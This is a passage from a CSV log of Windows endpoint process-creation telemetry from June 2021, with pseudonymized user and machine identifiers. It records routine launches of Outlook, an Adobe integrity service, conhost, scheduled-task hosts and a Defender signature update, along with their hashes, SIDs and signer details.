00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+686,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:21.981443600+00:00,16216,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",PortableExecutable,2021-06-12 08:57:23.540503500+00:00,C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,41367344,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:22.214097500+00:00,2021-06-24 00:53:26.877039+00:00,204d6523-5535-4424-96b1-681aad8b7ba3,computerpii_0a470890c60768167990033d701e7bd881398861,168043,False,10.7740.19041.1052,False,11540474045175127,,11540474045175171,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,3073.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook
+687,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:58:32.432859600+00:00,19208,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_lgjgwd 3",PortableExecutable,2018-05-11 03:50:54+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,3548360,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.806850600+00:00,4476,AGSService.exe,"""AGSService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:58:32.643679300+00:00,2021-06-24 03:59:46.161889500+00:00,118d2d56-07c9-4973-9f9d-cadbe87f2562,computerpii_0a470890c60768167990033d701e7bd881398861,175302,False,10.7740.19041.1052,False,11540474045136989,,11540474045176451,2021-06-10 00:46:11.806850600+00:00,4476,2021-06-10 00:46:11.806850600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,4476,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.831368700+00:00,2018-05-11 03:50:54+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service
+688,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:58:32.446807+00:00,17248,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:58:32.432859600+00:00,19208,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_lgjgwd 3",False,2021-06-10 00:46:11.806850600+00:00,4476,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:58:32.644250400+00:00,2021-06-24 03:59:46.161918200+00:00,5c1ee5dc-9b81-45bc-b83f-0c57aa80f8b9,computerpii_0a470890c60768167990033d701e7bd881398861,175303,False,10.7740.19041.1052,False,11540474045176451,,11540474045176452,2021-06-24 03:58:32.432859600+00:00,19208,2021-06-24 03:58:32.432859600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,19208,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-24 03:58:32.454841600+00:00,2018-05-11 03:50:54+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+689,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:58:32.861840100+00:00,20704,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_lkkivx 3",PortableExecutable,2018-05-11 03:50:54+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,3548360,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.806850600+00:00,4476,AGSService.exe,"""AGSService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:58:33.094064200+00:00,2021-06-24 03:59:46.162005300+00:00,a2c06227-114d-4648-a184-e0605a802f92,computerpii_0a470890c60768167990033d701e7bd881398861,175306,False,10.7740.19041.1052,False,11540474045136989,,11540474045176455,2021-06-10 00:46:11.806850600+00:00,4476,2021-06-10 00:46:11.806850600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,4476,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.831368700+00:00,2018-05-11 03:50:54+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service
+690,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:58:32.875795600+00:00,4580,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:58:32.861840100+00:00,20704,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_lkkivx 3",False,2021-06-10 00:46:11.806850600+00:00,4476,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:58:33.094504+00:00,2021-06-24 03:59:46.162034+00:00,54f6d4ed-c203-458b-82a6-5fbb61f8c8ca,computerpii_0a470890c60768167990033d701e7bd881398861,175307,False,10.7740.19041.1052,False,11540474045176455,,11540474045176456,2021-06-24 03:58:32.861840100+00:00,20704,2021-06-24 03:58:32.861840100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,20704,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-24 03:58:32.454841600+00:00,2018-05-11 03:50:54+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+691,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:58:33.083403600+00:00,18452,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_pnmngy 3",PortableExecutable,2018-05-11 03:50:54+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,3548360,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.806850600+00:00,4476,AGSService.exe,"""AGSService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:58:33.099331100+00:00,2021-06-24 03:59:46.162062700+00:00,e0e8acc7-68bb-4ca6-9029-f89eb4d94aff,computerpii_0a470890c60768167990033d701e7bd881398861,175308,False,10.7740.19041.1052,False,11540474045136989,,11540474045176459,2021-06-10 00:46:11.806850600+00:00,4476,2021-06-10 00:46:11.806850600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,4476,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.831368700+00:00,2018-05-11 03:50:54+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service
+692,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:58:33.091888200+00:00,13424,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:58:33.083403600+00:00,18452,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_pnmngy 3",False,2021-06-10 00:46:11.806850600+00:00,4476,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:58:33.325429200+00:00,2021-06-24 03:59:46.162149700+00:00,41285747-e177-4b06-8bba-660450b7845c,computerpii_0a470890c60768167990033d701e7bd881398861,175311,False,10.7740.19041.1052,False,11540474045176459,,11540474045176460,2021-06-24 03:58:33.083403600+00:00,18452,2021-06-24 03:58:33.083403600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,18452,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-24 03:58:32.454841600+00:00,2018-05-11 03:50:54+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+693,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 11:16:00.880342800+00:00,20040,taskhostw.exe,taskhostw.exe ExploitGuardPolicy,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:16:00.985823400+00:00,2021-06-24 11:18:23.912575400+00:00,eb1947ac-5e72-4cdc-a799-4c4eb7dd74a7,computerpii_0a470890c60768167990033d701e7bd881398861,180077,False,10.7740.19041.1052,False,11540474045136925,,11540474045177992,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+694,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 11:16:19.488702100+00:00,17192,MpCmdRun.exe,"""MpCmdRun.exe"" -AddDynamicSignature -Path ""C:\ProgramData\Microsoft\MSDefenderDynamicSignature.bin""",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,06291a6c019c8df6a2cdcd9bcf69e99f,e424757d661bb89804b7147fa5e4b60ec21816aed8dedba1b291c6d41bc190b4,092720f8052fbd0fd20d37fa3f16871493d13777,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 11:16:01.919876900+00:00,9892,omadmclient.exe,"omadmclient.exe /serverid ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /lookuptype 1 /initiator 0",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:16:19.511325400+00:00,2021-06-24 11:18:23.913706600+00:00,f8b7aaef-8a3b-4a46-97ca-2c3d0fbe6de1,computerpii_0a470890c60768167990033d701e7bd881398861,180088,False,10.7740.19041.1052,False,11540474045177998,,11540474045178004,2021-06-24 11:16:01.919876900+00:00,9892,2021-06-24 11:16:01.919876900+00:00,\Device\HarddiskVolume3\Windows\System32\omadmclient.exe,9892,16512,ActiveProcessStartkey,C:\Windows\System32,436736,2045-06-30 03:05:21+00:00,2021-06-09 01:20:50.429604200+00:00,2021-06-24 11:16:01.925922700+00:00,2021-06-09 01:20:50.418603800+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,omadmclient,omadmclient.exe,Host Process for OMA-DM Client,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+695,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 11:16:19.493818200+00:00,12636,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 11:16:19.488702100+00:00,17192,MpCmdRun.exe,"""MpCmdRun.exe"" -AddDynamicSignature -Path ""C:\ProgramData\Microsoft\MSDefenderDynamicSignature.bin""",True,2021-06-24 11:16:01.919876900+00:00,9892,\Device\HarddiskVolume3\Windows\System32\omadmclient.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:16:19.511791200+00:00,2021-06-24 11:18:23.913792300+00:00,a0f74a3c-8b0f-4a9f-8a1f-40278954dd8f,computerpii_0a470890c60768167990033d701e7bd881398861,180089,False,10.7740.19041.1052,False,11540474045178004,,11540474045178005,2021-06-24 11:16:19.488702100+00:00,17192,2021-06-24 11:16:19.488702100+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,17192,16512,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-24 11:08:41.114415300+00:00,2021-06-14 00:56:51.807361100+00:00,16512,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+696,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 11:16:19.611862300+00:00,11268,taskhostw.exe,taskhostw.exe HASCertRetr,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:16:20.065496100+00:00,2021-06-24 11:18:23.913970200+00:00,12a480dc-295d-4f14-9893-b2a7936da6ba,computerpii_0a470890c60768167990033d701e7bd881398861,180091,False,10.7740.19041.1052,False,11540474045136925,,11540474045178006,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 